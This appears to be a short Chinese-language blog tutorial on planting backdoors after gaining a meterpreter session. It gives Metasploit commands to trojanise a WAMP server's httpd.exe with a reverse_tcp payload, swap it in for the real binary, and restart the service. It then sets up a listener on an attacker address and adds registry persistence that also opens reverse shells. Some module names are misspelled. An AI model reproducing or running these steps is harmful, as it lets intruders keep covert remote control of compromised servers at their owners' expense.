0x07 安装后门

2018-12-06  本文已影响0人  Gatociego

一 在守护进行执行文件中注入后门

在获得meterpreter1之后安装后门的步骤

# 查看系统中有哪些进程,查看在哪些守护进程中安装后门
# 这里使用的服务器是wamp
ps -S httpd.exe

# 停止http服务进程
pkill httpd.exe

# 寻找改进程执行文件的位置
search -f httpd.exe -d C:\

# 下载该服务的执行文件
download C:\\httpd.exe

# 然后将meterpreter1放入后台
background

在服务器执行文件上安装后门

# 从meterpreter1返回到msfconsole
# 在服务执行文件上安装后门,默认端口4444
use payload/windows/x64/metepreter/reverse_tcp #后门上安装的shell
set lhost 192.168.10.115
generate -a x64 -p Windows -x httpd.exe -k -t exe -f http_backdoor.exe
后门制作结束
generate
-a 处理器架构
-p 操作系统平台
-x 后台使用的模板
-t 文件格式
-f 生成的后门文件

准备接受后台反弹的shell

use exploit/mulit/handler
set payload payload/windows/x64/metepreter/reverse_tcp # payload需要与后门上安装的相同
set lhost 192.168.10.115 #后门的shell只会发往115
exploit -j   # -j 允许在后台持续监听

进入meterpreter1安装后门

# 切换到服务执行文件所在的目录
cd C:\

# 将原始的服务执行文件备份
mv httpd.exe httpd-backup.exe

# 上传制作的后门文件
upload http_backdoor.exe

# 将后门文件更改为原先的名字
mv http_backdoor.exe httpd.exe

# 切换到目标机器的system sheel
shell

# 这个httpd是wampapache服务器的,停止wampapache,在开启wampapache
net stop wampapache
net start wampapache   #会直接启动httpd.exe

# 执行之后,系统就接受到了

二 在注册表中安装后门

# 前提要有一个meterpreter,这个meterpreter放入后天,假设session值为1
 use exploit/windows/local/registry_persistence 
set session 1 #目的是当前需要一个shell能够操作目标机器的注册表
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.10.115
exploit

# 需要在攻击机上监听可能返回的shell
use exploit/muilt/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.10.115
run -j  #进入后台监听

还有几个

上一篇下一篇

猜你喜欢

热点阅读